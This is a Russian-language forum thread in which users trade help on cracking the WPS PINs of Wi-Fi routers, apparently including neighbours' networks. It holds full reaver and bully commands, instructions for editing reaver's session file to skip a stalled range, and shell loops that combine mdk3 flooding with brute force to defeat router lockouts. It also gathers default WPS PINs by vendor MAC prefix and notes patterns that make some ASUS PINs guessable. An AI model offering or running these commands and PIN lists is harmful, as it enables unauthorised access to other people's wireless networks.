ХМ.....так нафиг тогда ключ????всё....пин есть,уже можно подключиться, уже потом спокойно посмотреть ключ,если прям так нужен....
Похоже, что перебор не завершился, а уперся. Скажи первую половину мак адреса - может у кого были похожие случаи. Еще видел мнение, что это такая защита и нужно продолжать перебор пропустив проблемное место. Например если упирается в районе 4440хххх, то попробовать меняя лог-файл ривера продолжить перебор например с 4540 ну или откуда возможно будет.
34:08:04 Я вот насчёт такой хитрой защиты тоже подумал. А как лог изменить? Открыл блокнотом, там 4-х и 3-х значные цифры в ряд. Где что менять? на всякий случай вот лог ривера- http://gfile.ru/a5Slz
так тогда ривер не 100% отработал,как ты говоришь.....нужно было смотреть,пошли ли пакеты 5,6,если нет...то нифига первые 4 цифры не подобрало,неправильные они....
Судя по твоему логу, ривер решил, что нашел пин. Но ты говоришь, что пин не подходит. Более того, ты говоришь, что ранее ривер тоже решил, что нашел пин, но он был немного другим. Да, это странно. Устройство от d-link и про него не известно, что оно может менять пины, скорее просто глючно работает. У пользователей уже были случаи, когда ривер ошибочно фиксировал нахождение первой половины пина и потом буксовал на завершающей стадии. Может кто еще что-то подскажет, а я вижу два варианта продолжения: 1. Обойти проблемное место и проверить остальной диапазон ривером. Для этого в файле 340804DC5A20.wpc изменить первые три строки: 4540 (здесь подбирать число, чтобы начался перебор) 0 0 далее ничего не менять. Соседний файл reaver.db не трогать или удалить - он появится снова. 2. Перебирать программой bully. С параметром -S у нее тоже можно меняя лог-файл начать прямо с 4440000. Замечено, что в некоторых случаях bully лучше обрабатывает глючные ответы (перепроверяет до полного выяснения).
Algierd Вообще-то с такими МАКами DLinkи у меня проходили без проблемм. Каким ривером работал? Если 1.4, то попробуй 1.3. Меня не однократно спасал в подобных ситуациях. reaver-1.3 -i mon0 -b 34:08:04C:5A:20 -vv
Был подобный случай. Использовал WIFISLAX 4.6, 3 раза одна и та же ерунда-буксует на одном и том же месте. Решил сделать последнюю 4-ю попытку, если не получится - да ну её к чертям. Запустил так же WIFISLAX, НО версию 4.7...и точка без пробуксовок капитулировала. Хотелось бы заметить, что в младшей версии пропущенных пинов обнаружить не удалось и до этого случая никаких проблем не было... Чертовщина какая-то.
В Kali Linux или WiFiSlax попробуй команды while true; do timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0; sleep 3; done; или while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done; Мне очень помогло-сломал таких точек уже 4.
Подскажите пожалуйста,в какое время вы включали этот алгоритм? Именно время суток. И за какое время сдались точки?
Включал после 6 вечера, две точки оставлял на ночь, две точки сдались за 4-5 часов, т.к. пин начинался на 0 и 2, остальные среди ночи были готовы. На одной точке ривер доходил до 99,99% и пароля не дал, а булли с первого раза.
Народ, не у кого не найдется WPS PIN от точек с таким мак адресом: 00-90-4C-C1-00-00 ? У роутеров DIR-320 слетает мак адрес при перепрошивке и меняется на этот. Я вот подумал, значит у них и WPS PIN должен поменятся вместе с маком. Может он вообще у всех становится одинаковым? Может получится найти какую нибудь закономерность. В нашем дворе у точки 00-90-4C-C1-00-00 пин был 87207026, а у вас?
Народ у кого есть личные базы с пинами, какое начало пина может быть у C4:3D:C7:69:9X:XX? Производитель netgear. Заранее спасибо.
C4:3D:C7:A9:7A:44 | 26214702 C4:3D:C7:85:CF:4C | 26013084 Начало скорее всего с 26, а дальше как получится, ибо база не велика по этому мак-адресу. Кстати, по-моему у меня уже был похожий пост...
Вряд ли подойдет тк у меня была подобная точка и PIN начинался с 7119 Этот вопрос действительно уже кто-то задавал, но вторая часть мак адреса точки совсем не похожа на те что в базе, а значит и диапазон возможных пин кодов другой
Начал составлять базу стандартных WPS пинов, выкладываю то что есть, может кто-то отсюда что-то новое узнает. Большую часть информации вытащил с помощью проги Router Scan. Без хлама. Code: /// D-Link DSL (BSSID: 1C:7E:E5, FC:75:16, 84:C9:B2, 28:10:7B, ...) 46264848 31957199 76229909 17084215 62327145 18836486 13090586 Code: /// MTS/Huawei (BSSID: BC:76:70, 4C:ED:DE, ...) 52382734 Code: /// Trendnet (BSSID: 00:14:D1): 99956042 95661469 Code: /// OnLime/Upvel (BSSID: F8:C0:91, D4:BF:7F) 99956042 Code: /// MGTS (BSSID: 00:1F:CE, ...) ZTE = 13419622 Qtech = HEX-2-DEC Code: /// Rostelecom/Sagemcom 7C:03:D8:XX:XX:XX = 10864111 7C:03:4C:XX:XX:XX = 11105824 Code: /// ZyXEL Keenetic I, II (BSSID: CC:5D:4E, CE:5D:4E, EC:43:F6, EE:43:F6, ...) HEX-2-DEC Еще заметил что у точек ASUS со старыми мак адресами (RT-G32, WL-520G) пин легко угадать, хоть алгоритм пока и неизвестен. Если 7-е и 8-е значение мак адреса точки есть в базе то первые 3 цифры совпадут, шансы 99,9% а чтоб найти четвертую нужно перебрать всего десятку кодов. На новых точках эту тему прикрыли. Code: 20:CF:30:D6:B6:DE 40715186 20:CF:30:[COLOR=Red]98[/COLOR]:E5:40 [COLOR=Red]002[/COLOR]01605 20:CF:30:D6:49:46 40434629 20:CF:30:[COLOR=Red]98[/COLOR]:EE:EC [COLOR=Red]002[/COLOR]26363 20:CF:30:[COLOR=Red]99[/COLOR]:1C:4F [COLOR=Red]003[/COLOR]42551 20:CF:30:87:D2:B0 77644107 20:CF:30:CE:1B:E3 37378967 20:CF:30:[COLOR=Red]99[/COLOR]:20:A9 [COLOR=Red]003[/COLOR]53694 20:CF:30:[COLOR=Red]99[/COLOR]:1F:01 [COLOR=Red]003[/COLOR]49451 20:CF:30:E5:0F:9C 82460334 20:CF:30:[COLOR=Red]99[/COLOR]:15:2F [COLOR=Red]003[/COLOR]24311 20:CF:30:D6:42:2F 40416472 20:CF:30:88:8A:FF 50748075 20:CF:30:[COLOR=Red]98[/COLOR]:E7:D0 [COLOR=Red]002[/COLOR]08161 Code: E0:CB:4E:[COLOR=Red]E4[/COLOR]:AF:84 [COLOR=Red]498[/COLOR]71401 E0:CB:4E:7E:81:C1 57431208 E0:CB:4E:[COLOR=Red]E4[/COLOR]:9D:A4 [COLOR=Red]498[/COLOR]25640 E0:CB:4E:DC:EF:9D 21554872 E0:CB:4E:38:0F:E4 14762147 Мак адреса которые чуть-чуть по новее, видно что разработчики постепенно начали добавлять шум хоть и в небольшой степени: Code: 48:5B:39:[COLOR=Red]BC[/COLOR]:4E:78 [COLOR=Red]234[/COLOR]08562 48:5B:39:[COLOR=Red]BC[/COLOR]:4C:9C [COLOR=Red]234[/COLOR]03802 48:5B:39:[COLOR=Yellow]D7[/COLOR]:29:CA [COLOR=Yellow]419[/COLOR]90742 48:5B:39:[COLOR=Yellow]D7[/COLOR]:34:C2 [COLOR=Yellow]067[/COLOR]08573 48:5B:39:BC:25:77 23303591 48:5B:39:[COLOR=Red]BC[/COLOR]:69:7B [COLOR=Red]234[/COLOR]77711 48:5B:39:BD:24:A8 23956889 48:5B:39:[COLOR=Red]BC[/COLOR]:62:23 [COLOR=Red]234[/COLOR]58918 Если есть у кого что добавить, пишите! А так же, кому не жалко, выкладывайте пин коды от точек E0:CB:4E:XX:XX:XX, 20:CF:30:XX:XX:XX и 48:5B:39:XX:XX:XX
Code: 20:CF:30:[COLOR=Red]D6[/COLOR]:[COLOR=Yellow]0B[/COLOR]:4D [COLOR=Red]40[/COLOR][COLOR=Yellow]27[/COLOR]5970 20:CF:30:[COLOR=Red]D6[/COLOR]:[COLOR=Yellow]0B[/COLOR]:7A [COLOR=Red]40[/COLOR][COLOR=Yellow]27[/COLOR]6427 20:CF:30:[COLOR=Red]D6[/COLOR]:[COLOR=Yellow]0B[/COLOR]:A5 [COLOR=Red]40[/COLOR][COLOR=Yellow]27[/COLOR]6854 20:CF:30:[COLOR=Red]D6[/COLOR]:12:E1 [COLOR=Red]40[/COLOR]295374 20:CF:30:[COLOR=Red]D6[/COLOR]:16:74 [COLOR=Red]40[/COLOR]304526 20:CF:30:[COLOR=Red]D6[/COLOR]:1B:C6 [COLOR=Red]40[/COLOR]318141 20:CF:30:[COLOR=Red]D6[/COLOR]:42:2F [COLOR=Red]40[/COLOR]416472 20:CF:30:[COLOR=Red]D6[/COLOR]:49:46 [COLOR=Red]40[/COLOR]434629 20:CF:30:[COLOR=Red]D6[/COLOR]:[COLOR=Yellow]4F[/COLOR]:53 [COLOR=Red]40[/COLOR][COLOR=Yellow]45[/COLOR]0117 20:CF:30:[COLOR=Red]D6[/COLOR]:[COLOR=Yellow]4F[/COLOR]:85 [COLOR=Red]40[/COLOR][COLOR=Yellow]45[/COLOR]0612 20:CF:30:[COLOR=Red]D6[/COLOR]:[COLOR=Yellow]B6[/COLOR]:DE [COLOR=Red]40[/COLOR][COLOR=Yellow]71[/COLOR]5186 20:CF:30:[COLOR=Red]D6[/COLOR]:[COLOR=Yellow]B[/COLOR][COLOR=Lime]7[/COLOR]:D0 [COLOR=Red]40[/COLOR][COLOR=Yellow]71[/COLOR]7609 Таки закономерности! Если дело так и дальше пойдёт, то это очень радует Возможно, на новых моделях не прикрыли. Просто мак адреса другие - другие пины.
